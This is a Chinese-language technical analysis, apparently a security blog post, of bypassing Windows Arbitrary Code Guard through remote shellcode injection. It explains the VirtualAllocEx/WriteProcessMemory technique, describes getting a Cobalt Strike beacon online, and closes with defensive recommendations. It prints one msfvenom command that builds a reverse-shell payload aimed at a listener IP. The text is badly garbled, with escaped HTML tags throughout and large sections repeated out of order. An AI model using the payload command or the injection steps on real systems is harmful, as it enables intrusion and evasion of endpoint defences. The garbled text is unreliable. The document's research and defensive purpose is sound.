Windows Arbitrary Code Guard (ACG) 绕过技术分析<\/h1>

1. ACG 概述<\/h2>
Arbitrary Code Guard (ACG) 是 Windows 系统的一种安全缓解策略，旨在防止恶意代码在进程内存中创建或修改可执行代码页。<\/p>

1.1 ACG 主要限制<\/h3>

代码页不可变性<\/strong>：<\/p>

现有进程代码页无法变为可写<\/li>
禁止使用 VirtualProtect<\/code> 将图像代码页改为 PAGE_EXECUTE_READWRITE<\/code><\/li> <\/ul> <\/li>
新代码页限制<\/strong>：<\/p> 无法创建新的未签名代码页<\/li> 禁止使用 VirtualAlloc<\/code> 创建 PAGE_EXECUTE_READWRITE<\/code> 代码页<\/li> <\/ul> <\/li> <\/ul> 1.2 ACG 对抗 EDR 的能力<\/h3> ACG 能有效对抗 EDR (Endpoint Detection and Response) 的检测机制：<\/p> EDR 通常通过 API hook 进行检测<\/li> EDR 会注入 DLL 到监控进程安装 hook<\/li> ACG 阻止了这些注入行为<\/li> <\/ul> 2. ACG 状态检查<\/h2> 使用 Process Hacker 查看 Mitigation Policies：<\/p> ProcessDynamicCodePolicy<\/code> 标志表示 ACG 是否启用<\/li> 1 表示启用，0 表示未启用<\/li> <\/ul> 3. 传统注入方法测试<\/h2> 3.1 DLL 注入测试<\/h3> 测试结果<\/strong>：<\/p> 开启 ACG 后直接 DLL 注入会导致：线程退出<\/li> 进程关闭<\/li> 无法成功注入上线<\/li> <\/ul> <\/li> <\/ul> 3.2 线程创建注入测试<\/h3> 测试方法<\/strong>：<\/p> 获取目标进程 PID 手动获取<\/li> 通过镜像列表查找<\/li> <\/ul> <\/li> 执行 shellcode 注入<\/li> <\/ol> 测试结果<\/strong>：<\/p> 请求 C2 (如 Cobalt Strike) 后程序直接关闭<\/li> 无法成功上线<\/li> <\/ul> 3.3 使用 msfvenom 测试<\/h3> msfvenom -p windows\/x64\/shell_reverse_tcp LHOST=<\/span>10.2.12.18 LPORT=<\/span>684<\/span> -f c <\/span><\/span><\/code><\/pre>测试结果<\/strong>：<\/p> 主机成功监听到 shell<\/li> 镜像列表查找 PID 方法也可行<\/li> <\/ul> 4. 代码注入绕过 ACG 的技术<\/h2> 4.1 绕过原理<\/h3> 尽管 ACG 启用，远程进程仍可对目标进程执行以下操作：<\/p> 使用 OpenProcess<\/code> 获取目标进程句柄<\/li> 使用 VirtualAllocEx<\/code> 分配内存 (PROCESS_ALL_ACCESS<\/code> 权限)<\/li> 内存属性可设为 PAGE_EXECUTE_READWRITE<\/code><\/li> 使用 WriteProcessMemory<\/code> 写入 Shellcode<\/li> 执行 Shellcode<\/li> <\/ol> 4.2 与传统 DLL 注入的区别<\/h3> 特性<\/th> 代码注入<\/th> DLL 注入<\/th> <\/tr> <\/thead> 依赖<\/td> 不依赖目标进程生成代码<\/td> 需要目标进程加载模块<\/td> <\/tr> 内存分配<\/td> 通过 VirtualAllocEx<\/code><\/td> 通过 VirtualAlloc<\/code><\/td> <\/tr> 模块加载<\/td> 不需要<\/td> 需要 LoadLibrary<\/code><\/td> <\/tr> ACG 影响<\/td> 可绕过<\/td> 被阻止<\/td> <\/tr> <\/tbody> <\/table> 4.3 关键发现<\/h3> ACG 不阻止远程进程通过 VirtualAllocEx<\/code> 和 WriteProcessMemory<\/code> 操作目标进程内存<\/li> ACG 主要阻止目标进程自身分配和执行 RWX 内存<\/li> 代码注入不涉及模块加载，因此绕过 ACG 限制<\/li> <\/ul> 5. 父子进程关系观察<\/h2> 测试现象<\/strong>：<\/p> 手动关闭程序后，nc shell 仍保持连接<\/li> 原因是启动程序的父进程 (cmd) 未关闭<\/li> 关闭父进程后连接断开<\/li> <\/ul> 与 Cobalt Strike 的区别<\/strong>：<\/p> CS 连接行为与此不同<\/li> <\/ul> 6. 第三方 DLL 注入现象<\/h2> 6.1 SangforTcpX64.dll 自动注入<\/h3> 观察结果<\/strong>：<\/p> 当注入 DLL 进行 TCP 请求时，SangforTcpX64.dll 自动注入<\/li> 仅注入 DLL 不进行 TCP 连接时，不会注入<\/li> 开启 ACG 后 Sangfor DLL 仍能加载，可能通过内核级注入<\/li> <\/ul> 6.2 Code Integrity Guard (CIG) 测试<\/h3> CIG 是更严格的用户态保护机制：<\/p> 强制代码完整性验证<\/li> 仅允许微软签名 DLL<\/li> <\/ul> 测试结果<\/strong>：<\/p> 编写网络请求程序并开启 CIG： Sangfor DLL 无法加载<\/li> 成功阻止非微软签名 DLL<\/li> <\/ul> <\/li> 注入微软签名 DLL：可以加载<\/li> 但网络请求仍失败<\/li> <\/ul> <\/li> <\/ol> 7. 总结与防御建议<\/h2> 7.1 ACG 的有效性总结<\/h3> 有效防护<\/strong>：<\/p> 阻止 DLL 注入<\/li> 防止目标进程自身分配 RWX 内存<\/li> 阻止 LoadLibrary 加载外部模块<\/li> <\/ul> <\/li> 绕过可能<\/strong>：<\/p> 不防御远程进程通过 VirtualAllocEx 和 WriteProcessMemory 的直接内存操作<\/li> 内核级注入仍可能成功<\/li> <\/ul> <\/li> <\/ul> 7.2 防御建议<\/h3> 结合使用 CIG 和 ACG：<\/p> CIG 确保只有签名代码可执行<\/li> ACG 防止内存修改<\/li> <\/ul> <\/li> 监控关键 API 调用：<\/p> VirtualAllocEx<\/li> WriteProcessMemory<\/li> CreateRemoteThread<\/li> <\/ul> <\/li> 限制进程权限：<\/p> 减少 PROCESS_ALL_ACCESS 权限分配<\/li> <\/ul> <\/li> 启用内核保护：<\/p> 防止内核级注入绕过用户态保护<\/li> <\/ul> <\/li> 行为监控：<\/p> 检测异常的进程间内存操作<\/li> 监控非预期的新线程创建<\/li> <\/ul> <\/li> <\/ol> 通过综合运用这些防护措施，可以显著提高系统对抗代码注入攻击的能力。<\/p>

特性<\/th>	代码注入<\/th>	DLL 注入<\/th> <\/tr> <\/thead>
依赖<\/td>	不依赖目标进程生成代码<\/td>	需要目标进程加载模块<\/td> <\/tr>
内存分配<\/td>	通过 `VirtualAllocEx<\/code><\/td>`	通过 `VirtualAlloc<\/code><\/td> <\/tr>`
模块加载<\/td>	不需要<\/td>	需要 `LoadLibrary<\/code><\/td> <\/tr>`
ACG 影响<\/td>	可绕过<\/td>	被阻止<\/td> <\/tr> <\/tbody> <\/table> 4.3 关键发现<\/h3> ACG 不阻止远程进程通过 `VirtualAllocEx<\/code> 和 WriteProcessMemory<\/code> 操作目标进程内存<\/li>` `ACG 主要阻止目标进程自身分配和执行 RWX 内存<\/li>` 代码注入不涉及模块加载，因此绕过 ACG 限制<\/li> <\/ul> 5. 父子进程关系观察<\/h2> 测试现象<\/strong>：<\/p> 手动关闭程序后，nc shell 仍保持连接<\/li> 原因是启动程序的父进程 (cmd) 未关闭<\/li> 关闭父进程后连接断开<\/li> <\/ul> 与 Cobalt Strike 的区别<\/strong>：<\/p> CS 连接行为与此不同<\/li> <\/ul> 6. 第三方 DLL 注入现象<\/h2> 6.1 SangforTcpX64.dll 自动注入<\/h3> 观察结果<\/strong>：<\/p> 当注入 DLL 进行 TCP 请求时，SangforTcpX64.dll 自动注入<\/li> 仅注入 DLL 不进行 TCP 连接时，不会注入<\/li> 开启 ACG 后 Sangfor DLL 仍能加载，可能通过内核级注入<\/li> <\/ul> 6.2 Code Integrity Guard (CIG) 测试<\/h3> CIG 是更严格的用户态保护机制：<\/p> 强制代码完整性验证<\/li> 仅允许微软签名 DLL<\/li> <\/ul> 测试结果<\/strong>：<\/p> 编写网络请求程序并开启 CIG： Sangfor DLL 无法加载<\/li> 成功阻止非微软签名 DLL<\/li> <\/ul> <\/li> 注入微软签名 DLL：可以加载<\/li> 但网络请求仍失败<\/li> <\/ul> <\/li> <\/ol> 7. 总结与防御建议<\/h2> 7.1 ACG 的有效性总结<\/h3> 有效防护<\/strong>：<\/p> 阻止 DLL 注入<\/li> 防止目标进程自身分配 RWX 内存<\/li> 阻止 LoadLibrary 加载外部模块<\/li> <\/ul> <\/li> 绕过可能<\/strong>：<\/p> 不防御远程进程通过 VirtualAllocEx 和 WriteProcessMemory 的直接内存操作<\/li> 内核级注入仍可能成功<\/li> <\/ul> <\/li> <\/ul> 7.2 防御建议<\/h3> 结合使用 CIG 和 ACG：<\/p> CIG 确保只有签名代码可执行<\/li> ACG 防止内存修改<\/li> <\/ul> <\/li> 监控关键 API 调用：<\/p> VirtualAllocEx<\/li> WriteProcessMemory<\/li> CreateRemoteThread<\/li> <\/ul> <\/li> 限制进程权限：<\/p> 减少 PROCESS_ALL_ACCESS 权限分配<\/li> <\/ul> <\/li> 启用内核保护：<\/p> 防止内核级注入绕过用户态保护<\/li> <\/ul> <\/li> 行为监控：<\/p> 检测异常的进程间内存操作<\/li> 监控非预期的新线程创建<\/li> <\/ul> <\/li> <\/ol> 通过综合运用这些防护措施，可以显著提高系统对抗代码注入攻击的能力。<\/p>

Windows Arbitrary Code Guard (ACG) 绕过技术分析<\/h1>

1. ACG 概述<\/h2> Arbitrary Code Guard (ACG) 是 Windows 系统的一种安全缓解策略，旨在防止恶意代码在进程内存中创建或修改可执行代码页。<\/p>

3. 传统注入方法测试<\/h2>

4. 代码注入绕过 ACG 的技术<\/h2>

6. 第三方 DLL 注入现象<\/h2>

7. 总结与防御建议<\/h2>

1. ACG 概述<\/h2>
Arbitrary Code Guard (ACG) 是 Windows 系统的一种安全缓解策略，旨在防止恶意代码在进程内存中创建或修改可执行代码页。<\/p>